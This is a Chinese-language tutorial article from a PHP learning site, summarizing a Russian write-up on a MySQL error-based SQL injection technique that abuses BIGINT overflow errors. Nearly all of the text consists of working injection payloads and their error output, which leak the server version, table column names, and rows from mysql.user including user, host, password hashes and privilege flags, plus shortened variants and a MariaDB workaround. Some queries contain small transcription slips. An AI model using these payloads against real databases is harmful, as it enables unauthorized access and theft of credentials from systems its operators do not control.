网站地图    收藏   

子栏目

主页 > 入门引导 > 黑客攻防 >

新型Mysql报错注入 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 原文是俄文,不好做翻译,附上大概的内容:这种报错注入主要基于Mysql数据类型溢出 mysql SELECT 18446744073709551610 * 2 ; ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is...

原文是俄文,不好做翻译,附上大概的内容:

这种报错注入主要基于Mysql数据类型溢出
 

mysql > SELECT 18446744073709551610 * 2 ; ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'   mysql > SELECT - 1 * 9223372036854775808 ; ERROR 1690 ( 22003 ): BIGINT UNSIGNED value is out of range in '(- (1) * 9223372036854775808)'



查询数据库版本:
 

mysql> SELECT * 2 (if ((SELECT * from (SELECT (version ()) ) s), 18446744073709551610, 18446744073709551610));   ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if (( Select ' 5.5 'from Dual), 18446744073709551610.18446744073709551610))'    



获取字段名称:
 

  mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);   ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'   // Узнаем имена колонок в таблице    



获取字段值:
 

mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610);   ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))'    



需要注意的是该方法并不适用于于老版的Mysql,除此之外你还需要了解错误信息的长度限制,因为这将决定你可以获取多长的信息:
 

mysys / my_error.c   /* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */ #define ERRMSGSIZE (512)



如果对象是MariaDB(Mysql的一个分支),当你尝试上面的方法时,你可能会看到这样的报错信息:
 

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610)) ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'



作为解决方案,可以通过这种方式来解决这个问题:
 

mysql> SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a; ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-MariaDB' is not null) - -(9223372036854775808))'



现在让我们看看能不能让我们的Vector更短一些

//查询数据库版本
 

SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610)) = select 1E308*if((select*from(select version())x),2,2) SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a = select if(x,2,2)*1E308 from(select version()x)y



//获取表字段名称
 

SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610) = select 1E308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)



//获取字段值
 

SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610) = select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)<(select*from mysql.user limit 0),2,2)



//获取指定字段的值
 

select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)

 



//获取字段个数
 

select 1E308*if((select*from mysql.user limit 1)>(select 1),2,2)



其它的一些变形
 

SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2); => select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0); mysql> select (select * from mysql.user)=1; mysql> select (select * from mysql.user)in(1);   ERROR 1241 (21000): Operand should contain 42 column(s) select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0); select if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)*1E308 SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a select (x!=0x00)--9223372036854775808 from(SELECT version()x)y mysql> select!x-~0.FROM(select+user()x)f; ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'



看到有人说,尝试无果期待验证…… 附上一张截图




 

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论